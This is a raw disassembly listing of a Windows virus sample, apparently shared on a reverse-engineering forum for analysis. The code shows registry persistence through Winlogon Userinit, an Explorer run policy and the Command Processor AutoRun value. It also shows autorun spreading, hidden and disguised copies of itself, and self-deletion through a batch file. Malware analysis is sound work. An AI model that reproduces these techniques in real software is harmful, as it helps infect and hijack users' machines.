004084CA 68 F2B64000 push 0040B6F2
004084CF 68 F4B64000 push 0040B6F4
004084D4 B9 ECB64000 mov ecx, 0040B6EC
004084D9 BA EAB64000 mov edx, 0040B6EA
004084DE B8 E8B64000 mov eax, 0040B6E8
004084E3 E8 3CE6FFFF call 00406B24
004084E8 66:A1 E8B64000 mov ax, word ptr [40B6E8]
004084EE 66:A3 F6B64000 mov word ptr [40B6F6], ax
004084F4 66:C705 E8B6400>mov word ptr [40B6E8], 7C3
004084FD 66:A1 EEB64000 mov ax, word ptr [40B6EE]
00408503 50 push eax
00408504 66:A1 F0B64000 mov ax, word ptr [40B6F0]
0040850A 50 push eax
0040850B 66:A1 F2B64000 mov ax, word ptr [40B6F2]
00408511 50 push eax
00408512 66:A1 F4B64000 mov ax, word ptr [40B6F4]
00408518 50 push eax
00408519 66:8B0D ECB6400>mov cx, word ptr [40B6EC]
00408520 66:8B15 EAB6400>mov dx, word ptr [40B6EA]
00408527 66:A1 E8B64000 mov ax, word ptr [40B6E8]
0040852D E8 46EFFFFF call 00407478
00408532 68 983A0000 push 3A98
00408537 E8 E4BDFFFF call 00404320 ; jmp 到 kernel32.Sleep
0040853C 33C0 xor eax, eax
0040853E 5A pop edx
0040853F 59 pop ecx
00408540 59 pop ecx
00408541 64:8910 mov dword ptr fs:[eax], edx
00408544 EB 0A jmp short 00408550
00408546 ^ E9 85AAFFFF jmp 00402FD0
0040854B E8 38ACFFFF call 00403188
00408550 8D55 A8 lea edx, dword ptr [ebp-58]
00408553 A1 04B74000 mov eax, dword ptr [40B704]
00408558 E8 8BDEFFFF call 004063E8
0040855D 8B45 A8 mov eax, dword ptr [ebp-58]
00408560 BA 54904000 mov edx, 00409054 ; ASCII "2863735ben"
00408565 E8 BAB3FFFF call 00403924
0040856A 74 1C je short 00408588
0040856C 8D55 A4 lea edx, dword ptr [ebp-5C]
0040856F A1 04B74000 mov eax, dword ptr [40B704]
00408574 E8 6FDEFFFF call 004063E8
00408579 8B45 A4 mov eax, dword ptr [ebp-5C]
0040857C BA 44904000 mov edx, 00409044 ; ASCII "test"
00408581 E8 9EB3FFFF call 00403924
00408586 75 71 jnz short 004085F9
00408588 33C0 xor eax, eax
0040858A 55 push ebp
0040858B 68 EF854000 push 004085EF
00408590 64:FF30 push dword ptr fs:[eax]
00408593 64:8920 mov dword ptr fs:[eax], esp
00408596 6A 00 push 0
00408598 A1 CCB64000 mov eax, dword ptr [40B6CC]
0040859D E8 36B4FFFF call 004039D8
004085A2 8BD8 mov ebx, eax
004085A4 53 push ebx
004085A5 E8 56BDFFFF call 00404300 ; jmp 到 kernel32.SetFileAttributesA
004085AA 68 F4010000 push 1F4
004085AF E8 6CBDFFFF call 00404320 ; jmp 到 kernel32.Sleep
004085B4 A1 CCB64000 mov eax, dword ptr [40B6CC]
004085B9 50 push eax
004085BA 8D45 A0 lea eax, dword ptr [ebp-60]
004085BD 50 push eax
004085BE 8B0D C8B64000 mov ecx, dword ptr [40B6C8]
004085C4 BA 68904000 mov edx, 00409068 ; ASCII "open"
004085C9 B8 78904000 mov eax, 00409078 ; ASCII "autorun"
004085CE E8 F1DAFFFF call 004060C4
004085D3 68 F4010000 push 1F4
004085D8 E8 43BDFFFF call 00404320 ; jmp 到 kernel32.Sleep
004085DD 6A 07 push 7
004085DF 53 push ebx
004085E0 E8 1BBDFFFF call 00404300 ; jmp 到 kernel32.SetFileAttributesA
004085E5 33C0 xor eax, eax
004085E7 5A pop edx
004085E8 59 pop ecx
004085E9 59 pop ecx
004085EA 64:8910 mov dword ptr fs:[eax], edx
004085ED EB 0A jmp short 004085F9
004085EF ^ E9 DCA9FFFF jmp 00402FD0
004085F4 E8 8FABFFFF call 00403188
004085F9 A1 C0B64000 mov eax, dword ptr [40B6C0]
004085FE E8 5DC8FFFF call 00404E60
00408603 8BD8 mov ebx, eax
00408605 A1 C4B64000 mov eax, dword ptr [40B6C4]
0040860A E8 51C8FFFF call 00404E60
0040860F 3BD8 cmp ebx, eax
00408611 0F8E A0010000 jle 004087B7
00408617 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040861C 50 push eax
0040861D 8D45 9C lea eax, dword ptr [ebp-64]
00408620 50 push eax
00408621 8B0D C0B64000 mov ecx, dword ptr [40B6C0]
00408627 BA D48F4000 mov edx, 00408FD4 ; ASCII "ver"
0040862C A1 E4B64000 mov eax, dword ptr [40B6E4]
00408631 E8 8EDAFFFF call 004060C4
00408636 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040863B 50 push eax
0040863C 8D45 98 lea eax, dword ptr [ebp-68]
0040863F 50 push eax
00408640 33C9 xor ecx, ecx
00408642 BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408647 B8 94904000 mov eax, 00409094 ; ASCII "dll_start"
0040864C E8 BBD9FFFF call 0040600C
00408651 8B55 98 mov edx, dword ptr [ebp-68]
00408654 B8 B0B64000 mov eax, 0040B6B0
00408659 E8 56B0FFFF call 004036B4
0040865E A1 A0B64000 mov eax, dword ptr [40B6A0]
00408663 50 push eax
00408664 8D45 94 lea eax, dword ptr [ebp-6C]
00408667 50 push eax
00408668 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
0040866E BA A8904000 mov edx, 004090A8 ; ASCII "dll"
00408673 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408678 E8 47DAFFFF call 004060C4
0040867D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408682 50 push eax
00408683 8D45 90 lea eax, dword ptr [ebp-70]
00408686 50 push eax
00408687 33C9 xor ecx, ecx
00408689 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040868E B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
00408693 E8 74D9FFFF call 0040600C
00408698 8B55 90 mov edx, dword ptr [ebp-70]
0040869B B8 B0B64000 mov eax, 0040B6B0
004086A0 E8 0FB0FFFF call 004036B4
004086A5 A1 A0B64000 mov eax, dword ptr [40B6A0]
004086AA 50 push eax
004086AB 8D45 8C lea eax, dword ptr [ebp-74]
004086AE 50 push eax
004086AF 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
004086B5 BA C0904000 mov edx, 004090C0 ; ASCII "exe"
004086BA B8 B4904000 mov eax, 004090B4 ; ASCII "old"
004086BF E8 00DAFFFF call 004060C4
004086C4 A1 A0B64000 mov eax, dword ptr [40B6A0]
004086C9 50 push eax
004086CA 8D45 88 lea eax, dword ptr [ebp-78]
004086CD 50 push eax
004086CE 33C9 xor ecx, ecx
004086D0 BA 88904000 mov edx, 00409088 ; ASCII "fn"
004086D5 B8 CC904000 mov eax, 004090CC ; ASCII "dll_hitpop"
004086DA E8 2DD9FFFF call 0040600C
004086DF 8B55 88 mov edx, dword ptr [ebp-78]
004086E2 B8 B0B64000 mov eax, 0040B6B0
004086E7 E8 C8AFFFFF call 004036B4
004086EC A1 A0B64000 mov eax, dword ptr [40B6A0]
004086F1 50 push eax
004086F2 8D45 84 lea eax, dword ptr [ebp-7C]
004086F5 50 push eax
004086F6 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
004086FC BA E0904000 mov edx, 004090E0 ; ASCII "dll32"
00408701 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408706 E8 B9D9FFFF call 004060C4
0040870B A1 A0B64000 mov eax, dword ptr [40B6A0]
00408710 50 push eax
00408711 8D45 80 lea eax, dword ptr [ebp-80]
00408714 50 push eax
00408715 33C9 xor ecx, ecx
00408717 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040871C B8 F0904000 mov eax, 004090F0 ; ASCII "exe_bak"
00408721 E8 E6D8FFFF call 0040600C
00408726 8B55 80 mov edx, dword ptr [ebp-80]
00408729 B8 B0B64000 mov eax, 0040B6B0
0040872E E8 81AFFFFF call 004036B4
00408733 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408738 E8 F3EAFFFF call 00407230
0040873D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408742 50 push eax
00408743 8D85 7CFFFFFF lea eax, dword ptr [ebp-84]
00408749 50 push eax
0040874A 33C9 xor ecx, ecx
0040874C BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408751 B8 00914000 mov eax, 00409100 ; ASCII "dll_start_bak"
00408756 E8 B1D8FFFF call 0040600C
0040875B 8B95 7CFFFFFF mov edx, dword ptr [ebp-84]
00408761 B8 B0B64000 mov eax, 0040B6B0
00408766 E8 49AFFFFF call 004036B4
0040876B A1 B0B64000 mov eax, dword ptr [40B6B0]
00408770 E8 BBEAFFFF call 00407230
00408775 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040877A 50 push eax
0040877B 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
00408781 50 push eax
00408782 33C9 xor ecx, ecx
00408784 BA 18914000 mov edx, 00409118 ; ASCII "fn_pif"
00408789 B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
0040878E E8 79D8FFFF call 0040600C
00408793 8B95 78FFFFFF mov edx, dword ptr [ebp-88]
00408799 B8 B0B64000 mov eax, 0040B6B0
0040879E E8 11AFFFFF call 004036B4
004087A3 A1 B0B64000 mov eax, dword ptr [40B6B0]
004087A8 E8 83EAFFFF call 00407230
004087AD 68 E8030000 push 3E8
004087B2 E8 69BBFFFF call 00404320 ; jmp 到 kernel32.Sleep
004087B7 8D85 74FFFFFF lea eax, dword ptr [ebp-8C]
004087BD E8 BAC5FFFF call 00404D7C
004087C2 8B15 C8B64000 mov edx, dword ptr [40B6C8]
004087C8 A1 B8B64000 mov eax, dword ptr [40B6B8]
004087CD E8 FAEAFFFF call 004072CC
004087D2 A1 A0B64000 mov eax, dword ptr [40B6A0]
004087D7 50 push eax
004087D8 8D85 70FFFFFF lea eax, dword ptr [ebp-90]
004087DE 50 push eax
004087DF 8B0D C8B64000 mov ecx, dword ptr [40B6C8]
004087E5 BA 18914000 mov edx, 00409118 ; ASCII "fn_pif"
004087EA B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
004087EF E8 D0D8FFFF call 004060C4
004087F4 FF35 B4B64000 push dword ptr [40B6B4]
004087FA FF35 D0B64000 push dword ptr [40B6D0]
00408800 FF35 C0B64000 push dword ptr [40B6C0]
00408806 68 E08F4000 push 00408FE0 ; ASCII ".exe"
0040880B B8 B0B64000 mov eax, 0040B6B0
00408810 BA 04000000 mov edx, 4
00408815 E8 7EB0FFFF call 00403898
0040881A 8B15 B0B64000 mov edx, dword ptr [40B6B0]
00408820 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408825 E8 A2EAFFFF call 004072CC
0040882A A1 A0B64000 mov eax, dword ptr [40B6A0]
0040882F 50 push eax
00408830 8D85 6CFFFFFF lea eax, dword ptr [ebp-94]
00408836 50 push eax
00408837 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
0040883D BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408842 B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
00408847 E8 78D8FFFF call 004060C4
0040884C FF35 B4B64000 push dword ptr [40B6B4]
00408852 FF35 DCB64000 push dword ptr [40B6DC]
00408858 FF35 C0B64000 push dword ptr [40B6C0]
0040885E 68 28914000 push 00409128 ; ASCII ".scr"
00408863 B8 B0B64000 mov eax, 0040B6B0
00408868 BA 04000000 mov edx, 4
0040886D E8 26B0FFFF call 00403898
00408872 8B15 B0B64000 mov edx, dword ptr [40B6B0]
00408878 A1 B8B64000 mov eax, dword ptr [40B6B8]
0040887D E8 4AEAFFFF call 004072CC
00408882 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408887 50 push eax
00408888 8D85 68FFFFFF lea eax, dword ptr [ebp-98]
0040888E 50 push eax
0040888F 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
00408895 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040889A B8 F0904000 mov eax, 004090F0 ; ASCII "exe_bak"
0040889F E8 20D8FFFF call 004060C4
004088A4 FF35 B4B64000 push dword ptr [40B6B4]
004088AA FF35 D8B64000 push dword ptr [40B6D8]
004088B0 FF35 C0B64000 push dword ptr [40B6C0]
004088B6 68 F08F4000 push 00408FF0 ; ASCII ".dll"
004088BB B8 B0B64000 mov eax, 0040B6B0
004088C0 BA 04000000 mov edx, 4
004088C5 E8 CEAFFFFF call 00403898
004088CA B8 FCB64000 mov eax, 0040B6FC
004088CF 8B0D E4B64000 mov ecx, dword ptr [40B6E4]
004088D5 BA 38914000 mov edx, 00409138 ; ASCII "dll_"
004088DA E8 45AFFFFF call 00403824
004088DF A1 FCB64000 mov eax, dword ptr [40B6FC]
004088E4 50 push eax
004088E5 68 88904000 push 00409088 ; ASCII "fn"
004088EA A1 A0B64000 mov eax, dword ptr [40B6A0]
004088EF 50 push eax
004088F0 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
004088F5 BA 48914000 mov edx, 00409148 ; ASCII "maindll"
004088FA A1 B0B64000 mov eax, dword ptr [40B6B0]
004088FF E8 80EAFFFF call 00407384
00408904 B8 00B74000 mov eax, 0040B700
00408909 8B15 B0B64000 mov edx, dword ptr [40B6B0]
0040890F E8 A0ADFFFF call 004036B4
00408914 FF35 B4B64000 push dword ptr [40B6B4]
0040891A FF35 E0B64000 push dword ptr [40B6E0]
00408920 FF35 C0B64000 push dword ptr [40B6C0]
00408926 68 28914000 push 00409128 ; ASCII ".scr"
0040892B B8 B0B64000 mov eax, 0040B6B0
00408930 BA 04000000 mov edx, 4
00408935 E8 5EAFFFFF call 00403898
0040893A 68 00914000 push 00409100 ; ASCII "dll_start_bak"
0040893F 68 88904000 push 00409088 ; ASCII "fn"
00408944 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408949 50 push eax
0040894A B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
0040894F BA 58914000 mov edx, 00409158 ; ASCII "start"
00408954 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408959 E8 26EAFFFF call 00407384
0040895E FF35 B4B64000 push dword ptr [40B6B4]
00408964 FF35 D4B64000 push dword ptr [40B6D4]
0040896A FF35 C0B64000 push dword ptr [40B6C0]
00408970 68 F08F4000 push 00408FF0 ; ASCII ".dll"
00408975 B8 B0B64000 mov eax, 0040B6B0
0040897A BA 04000000 mov edx, 4
0040897F E8 14AFFFFF call 00403898
00408984 68 94904000 push 00409094 ; ASCII "dll_start"
00408989 68 88904000 push 00409088 ; ASCII "fn"
0040898E A1 A0B64000 mov eax, dword ptr [40B6A0]
00408993 50 push eax
00408994 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
00408999 BA 58914000 mov edx, 00409158 ; ASCII "start"
0040899E A1 B0B64000 mov eax, dword ptr [40B6B0]
004089A3 E8 DCE9FFFF call 00407384
004089A8 A1 B0B64000 mov eax, dword ptr [40B6B0]
004089AD 50 push eax
004089AE E8 51D6FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
004089B3 85C0 test eax, eax
004089B5 0F84 9A000000 je 00408A55
004089BB 8D85 64FFFFFF lea eax, dword ptr [ebp-9C]
004089C1 E8 B6C3FFFF call 00404D7C
004089C6 A1 C0B64000 mov eax, dword ptr [40B6C0]
004089CB E8 90C4FFFF call 00404E60
004089D0 8BD8 mov ebx, eax
004089D2 A1 C4B64000 mov eax, dword ptr [40B6C4]
004089D7 E8 84C4FFFF call 00404E60
004089DC 3BD8 cmp ebx, eax
004089DE 7C 54 jl short 00408A34
004089E0 68 68914000 push 00409168 ; ASCII "userinit.exe"
004089E5 B9 80914000 mov ecx, 00409180 ; ASCII "Userinit"
004089EA BA 94914000 mov edx, 00409194 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
004089EF B8 02000080 mov eax, 80000002
004089F4 E8 17DDFFFF call 00406710
004089F9 68 D4914000 push 004091D4 ; ASCII "rundll32.exe "
004089FE FF35 B0B64000 push dword ptr [40B6B0]
00408A04 68 EC914000 push 004091EC ; ASCII " start"
00408A09 8D85 60FFFFFF lea eax, dword ptr [ebp-A0]
00408A0F BA 03000000 mov edx, 3
00408A14 E8 7FAEFFFF call 00403898
00408A19 8B85 60FFFFFF mov eax, dword ptr [ebp-A0]
00408A1F 50 push eax
00408A20 B9 80914000 mov ecx, 00409180 ; ASCII "Userinit"
00408A25 BA FC914000 mov edx, 004091FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run"
00408A2A B8 02000080 mov eax, 80000002
00408A2F E8 DCDCFFFF call 00406710
00408A34 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A39 50 push eax
00408A3A 8D85 5CFFFFFF lea eax, dword ptr [ebp-A4]
00408A40 50 push eax
00408A41 B9 C88F4000 mov ecx, 00408FC8
00408A46 BA 44924000 mov edx, 00409244 ; ASCII "kv"
00408A4B A1 E4B64000 mov eax, dword ptr [40B6E4]
00408A50 E8 6FD6FFFF call 004060C4
00408A55 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A5A 50 push eax
00408A5B 8D85 58FFFFFF lea eax, dword ptr [ebp-A8]
00408A61 50 push eax
00408A62 33C9 xor ecx, ecx
00408A64 BA A8904000 mov edx, 004090A8 ; ASCII "dll"
00408A69 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408A6E E8 99D5FFFF call 0040600C
00408A73 8B95 58FFFFFF mov edx, dword ptr [ebp-A8]
00408A79 B8 B0B64000 mov eax, 0040B6B0
00408A7E E8 31ACFFFF call 004036B4
00408A83 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408A88 E8 A3E7FFFF call 00407230
00408A8D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A92 50 push eax
00408A93 8D85 54FFFFFF lea eax, dword ptr [ebp-AC]
00408A99 50 push eax
00408A9A 33C9 xor ecx, ecx
00408A9C BA C0904000 mov edx, 004090C0 ; ASCII "exe"
00408AA1 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408AA6 E8 61D5FFFF call 0040600C
00408AAB 8B95 54FFFFFF mov edx, dword ptr [ebp-AC]
00408AB1 B8 B0B64000 mov eax, 0040B6B0
00408AB6 E8 F9ABFFFF call 004036B4
00408ABB A1 B0B64000 mov eax, dword ptr [40B6B0]
00408AC0 E8 6BE7FFFF call 00407230
00408AC5 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408ACA 50 push eax
00408ACB 8D85 50FFFFFF lea eax, dword ptr [ebp-B0]
00408AD1 50 push eax
00408AD2 33C9 xor ecx, ecx
00408AD4 BA E0904000 mov edx, 004090E0 ; ASCII "dll32"
00408AD9 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408ADE E8 29D5FFFF call 0040600C
00408AE3 8B95 50FFFFFF mov edx, dword ptr [ebp-B0]
00408AE9 B8 B0B64000 mov eax, 0040B6B0
00408AEE E8 C1ABFFFF call 004036B4
00408AF3 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408AF8 E8 33E7FFFF call 00407230
00408AFD A1 00B74000 mov eax, dword ptr [40B700]
00408B02 50 push eax
00408B03 E8 FCD4FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408B08 85C0 test eax, eax
00408B0A 0F84 10010000 je 00408C20
00408B10 8D95 4CFFFFFF lea edx, dword ptr [ebp-B4]
00408B16 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408B1B E8 C8D8FFFF call 004063E8
00408B20 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00408B26 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408B2C E8 F3ADFFFF call 00403924
00408B31 0F84 E9000000 je 00408C20
00408B37 A1 C0B64000 mov eax, dword ptr [40B6C0]
00408B3C E8 1FC3FFFF call 00404E60
00408B41 8BD8 mov ebx, eax
00408B43 A1 C4B64000 mov eax, dword ptr [40B6C4]
00408B48 E8 13C3FFFF call 00404E60
00408B4D 3BD8 cmp ebx, eax
00408B4F 0F8C CB000000 jl 00408C20
00408B55 68 50924000 push 00409250 ; ASCII "no"
00408B5A B9 5C924000 mov ecx, 0040925C ; ASCII "Check_Associations"
00408B5F BA 78924000 mov edx, 00409278 ; ASCII "Software\Microsoft\Internet Explorer\Main"
00408B64 B8 01000080 mov eax, 80000001
00408B69 E8 A2DBFFFF call 00406710
00408B6E 6A 00 push 0
00408B70 B9 AC924000 mov ecx, 004092AC ; ASCII "EnableAutodial"
00408B75 BA C4924000 mov edx, 004092C4 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Internet Settings"
00408B7A B8 01000080 mov eax, 80000001
00408B7F E8 78F2FFFF call 00407DFC
00408B84 6A 00 push 0
00408B86 B9 08934000 mov ecx, 00409308 ; ASCII "NoNetAutodial"
00408B8B BA C4924000 mov edx, 004092C4 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Internet Settings"
00408B90 B8 01000080 mov eax, 80000001
00408B95 E8 62F2FFFF call 00407DFC
00408B9A A1 00B74000 mov eax, dword ptr [40B700]
00408B9F E8 8CE6FFFF call 00407230
00408BA4 68 E8030000 push 3E8
00408BA9 E8 72B7FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408BAE A1 00B74000 mov eax, dword ptr [40B700]
00408BB3 50 push eax
00408BB4 E8 4BD4FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408BB9 83F8 01 cmp eax, 1
00408BBC 1BC0 sbb eax, eax
00408BBE 40 inc eax
00408BBF 84C0 test al, al
00408BC1 75 5D jnz short 00408C20
00408BC3 B8 FCB64000 mov eax, 0040B6FC
00408BC8 8B0D E4B64000 mov ecx, dword ptr [40B6E4]
00408BCE BA 38914000 mov edx, 00409138 ; ASCII "dll_"
00408BD3 E8 4CACFFFF call 00403824
00408BD8 A1 FCB64000 mov eax, dword ptr [40B6FC]
00408BDD 50 push eax
00408BDE 68 88904000 push 00409088 ; ASCII "fn"
00408BE3 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408BE8 50 push eax
00408BE9 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
00408BEE BA 48914000 mov edx, 00409148 ; ASCII "maindll"
00408BF3 A1 00B74000 mov eax, dword ptr [40B700]
00408BF8 E8 87E7FFFF call 00407384
00408BFD 68 E8030000 push 3E8
00408C02 E8 19B7FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408C07 A1 00B74000 mov eax, dword ptr [40B700]
00408C0C 50 push eax
00408C0D E8 F2D3FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408C12 85C0 test eax, eax
00408C14 74 0A je short 00408C20
00408C16 A1 00B74000 mov eax, dword ptr [40B700]
00408C1B E8 A4ECFFFF call 004078C4
00408C20 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408C25 50 push eax
00408C26 E8 D9D3FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408C2B 85C0 test eax, eax
00408C2D 74 1A je short 00408C49
00408C2F A1 C8B64000 mov eax, dword ptr [40B6C8]
00408C34 50 push eax
00408C35 B9 20934000 mov ecx, 00409320 ; ASCII "AutoRun"
00408C3A BA 30934000 mov edx, 00409330 ; ASCII "SOFTWARE\Microsoft\Command Processor"
00408C3F B8 02000080 mov eax, 80000002
00408C44 E8 C7DAFFFF call 00406710
00408C49 33C0 xor eax, eax
00408C4B 5A pop edx
00408C4C 59 pop ecx
00408C4D 59 pop ecx
00408C4E 64:8910 mov dword ptr fs:[eax], edx
00408C51 EB 0A jmp short 00408C5D
00408C53 ^ E9 78A3FFFF jmp 00402FD0
00408C58 E8 2BA5FFFF call 00403188
00408C5D 33C0 xor eax, eax
00408C5F 5A pop edx
00408C60 59 pop ecx
00408C61 59 pop ecx
00408C62 64:8910 mov dword ptr fs:[eax], edx
00408C65 68 058E4000 push 00408E05
00408C6A 803D F8B64000 0>cmp byte ptr [40B6F8], 0
00408C71 0F84 AB000000 je 00408D22
00408C77 33C0 xor eax, eax
00408C79 55 push ebp
00408C7A 68 188D4000 push 00408D18
00408C7F 64:FF30 push dword ptr fs:[eax]
00408C82 64:8920 mov dword ptr fs:[eax], esp
00408C85 E8 7AE0FFFF call 00406D04
00408C8A 83C4 F8 add esp, -8
00408C8D DD1C24 fstp qword ptr [esp]
00408C90 9B wait
00408C91 68 EEB64000 push 0040B6EE
00408C96 68 F0B64000 push 0040B6F0
00408C9B 68 F2B64000 push 0040B6F2
00408CA0 68 F4B64000 push 0040B6F4
00408CA5 B9 ECB64000 mov ecx, 0040B6EC
00408CAA BA EAB64000 mov edx, 0040B6EA
00408CAF B8 E8B64000 mov eax, 0040B6E8
00408CB4 E8 6BDEFFFF call 00406B24
00408CB9 66:A1 F6B64000 mov ax, word ptr [40B6F6]
00408CBF 66:A3 E8B64000 mov word ptr [40B6E8], ax
00408CC5 66:813D E8B6400>cmp word ptr [40B6E8], 7D7
00408CCE 73 09 jnb short 00408CD9
00408CD0 66:C705 E8B6400>mov word ptr [40B6E8], 7D7
00408CD9 66:A1 EEB64000 mov ax, word ptr [40B6EE]
00408CDF 50 push eax
00408CE0 66:A1 F0B64000 mov ax, word ptr [40B6F0]
00408CE6 50 push eax
00408CE7 66:A1 F2B64000 mov ax, word ptr [40B6F2]
00408CED 50 push eax
00408CEE 66:A1 F4B64000 mov ax, word ptr [40B6F4]
00408CF4 50 push eax
00408CF5 66:8B0D ECB6400>mov cx, word ptr [40B6EC]
00408CFC 66:8B15 EAB6400>mov dx, word ptr [40B6EA]
00408D03 66:A1 E8B64000 mov ax, word ptr [40B6E8]
00408D09 E8 6AE7FFFF call 00407478
00408D0E 33C0 xor eax, eax
00408D10 5A pop edx
00408D11 59 pop ecx
00408D12 59 pop ecx
00408D13 64:8910 mov dword ptr fs:[eax], edx
00408D16 EB 0A jmp short 00408D22
00408D18 ^ E9 B3A2FFFF jmp 00402FD0
00408D1D E8 66A4FFFF call 00403188
00408D22 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408D27 50 push eax
00408D28 8D85 48FFFFFF lea eax, dword ptr [ebp-B8]
00408D2E 50 push eax
00408D2F B9 60934000 mov ecx, 00409360 ; ASCII "c:\myDelm.bat"
00408D34 BA 78934000 mov edx, 00409378 ; ASCII "bat"
00408D39 B8 84934000 mov eax, 00409384 ; ASCII "sys"
00408D3E E8 81D3FFFF call 004060C4
00408D43 803D 9CB64000 0>cmp byte ptr [40B69C], 0
00408D4A 75 0A jnz short 00408D56
00408D4C 68 983A0000 push 3A98
00408D51 E8 CAB5FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408D56 833D 08B74000 0>cmp dword ptr [40B708], 0
00408D5D 74 11 je short 00408D70
00408D5F 6A 00 push 0
00408D61 A1 08B74000 mov eax, dword ptr [40B708]
00408D66 50 push eax
00408D67 E8 CCB5FFFF call 00404338 ; jmp 到 kernel32.WaitForSingleObject
00408D6C 85C0 test eax, eax
00408D6E ^ 75 EF jnz short 00408D5F
00408D70 8D95 44FFFFFF lea edx, dword ptr [ebp-BC]
00408D76 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408D7B E8 68D6FFFF call 004063E8
00408D80 8B85 44FFFFFF mov eax, dword ptr [ebp-BC]
00408D86 50 push eax
00408D87 8D95 40FFFFFF lea edx, dword ptr [ebp-C0]
00408D8D A1 B4B64000 mov eax, dword ptr [40B6B4]
00408D92 E8 51D6FFFF call 004063E8
00408D97 8B85 40FFFFFF mov eax, dword ptr [ebp-C0]
00408D9D 5A pop edx
00408D9E E8 15ADFFFF call 00403AB8
00408DA3 85C0 test eax, eax
00408DA5 7F 53 jg short 00408DFA
00408DA7 8D95 3CFFFFFF lea edx, dword ptr [ebp-C4]
00408DAD A1 C8B64000 mov eax, dword ptr [40B6C8]
00408DB2 E8 31D6FFFF call 004063E8
00408DB7 8B85 3CFFFFFF mov eax, dword ptr [ebp-C4]
00408DBD 50 push eax
00408DBE 8D95 38FFFFFF lea edx, dword ptr [ebp-C8]
00408DC4 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408DC9 E8 1AD6FFFF call 004063E8
00408DCE 8B95 38FFFFFF mov edx, dword ptr [ebp-C8]
00408DD4 58 pop eax
00408DD5 E8 4AABFFFF call 00403924
00408DDA 74 1E je short 00408DFA
00408DDC 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408DE2 B8 90934000 mov eax, 00409390 ; ASCII "system32"
00408DE7 E8 CCACFFFF call 00403AB8
00408DEC 85C0 test eax, eax
00408DEE 7F 0A jg short 00408DFA
00408DF0 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408DF5 E8 7ED3FFFF call 00406178
00408DFA C3 retn
00408DFB ^ E9 FCA2FFFF jmp 004030FC
00408E00 ^ E9 65FEFFFF jmp 00408C6A
00408E05 8D85 34FFFFFF lea eax, dword ptr [ebp-CC]
00408E0B E8 6CBFFFFF call 00404D7C
00408E10 33C0 xor eax, eax
00408E12 5A pop edx
00408E13 59 pop ecx
00408E14 59 pop ecx
00408E15 64:8910 mov dword ptr fs:[eax], edx
00408E18 68 358E4000 push 00408E35
00408E1D 8D85 34FFFFFF lea eax, dword ptr [ebp-CC]
00408E23 BA 2F000000 mov edx, 2F
00408E28 E8 57A8FFFF call 00403684
00408E2D C3 retn
下面附件是病毒样本
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
